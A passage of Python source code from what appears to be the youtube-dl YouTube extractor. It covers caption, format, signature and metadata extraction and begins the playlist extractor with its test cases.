return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
# Does not used anymore as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
# An extractor error can be raise by the download process if there are
# no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info):
playback_url = video_info.get('videostats_playback_base_url', [None])[0]
if not playback_url:
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
# Extract original video URL from URL with redirection, like age verification, using next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate the access to the video from www.youtube.com/v/{video_id}
# this can be viewed without login into Youtube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# Rental video is not rented but preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/rg3/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
# We also try looking in get_video_info since it may contain different dashmpd
# URL that points to a DASH manifest with possibly different itag set (some itags
# are missing from DASH manifest pointed by webpage's dashmpd, some - from DASH
# manifest pointed by get_video_info's dashmpd).
# The general idea is to take a union of itags of both DASH manifests (for example
# video with such 'manifest behavior' see https://github.com/rg3/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/rg3/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
# Working around by preferring the first succeeded video_info containing
# the token if no such video_info yet was found.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
# title
if 'title' in video_info:
video_title = video_info['title'][0]
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if 'multifeed_metadata_list' in video_info and not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
entries = []
feed_ids = []
multifeed_metadata_list = video_info['multifeed_metadata_list'][0]
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/rg3/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/rg3/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/rg3/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
fmt_list = video_info.get('fmt_list', [''])[0]
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
formats = []
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player)-([^/]+)(?:/[a-z]{2}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in DASH manifest thus corresponding formats will
# lack metadata (see https://github.com/rg3/youtube-dl/pull/5993).
# Trying to extract metadata from url_encoded_fmt_stream_map entry.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality_label', [None])[0] or url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
elif video_info.get('hlsvp'):
manifest_url = video_info['hlsvp'][0]
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# Accept-Encoding header causes failures in live streams on Youtube and Youtube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(video_info, lambda x: x['author'][0], compat_str)
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
# thumbnail image
# We try first to get a high quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = m_episode.group('series')
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
# Additional DASH manifests may end up in HTTP Error 403 therefore
# allow them to fail without bug report message if we already have
# some DASH manifest succeeded. This is temporary workaround to reduce
# burst of bug reports until we figure out the reason and whether it
# can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH, they
# contain less info and it can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/rg3/youtube-dl/issues/5774 for an
# example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
youtube\.com/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
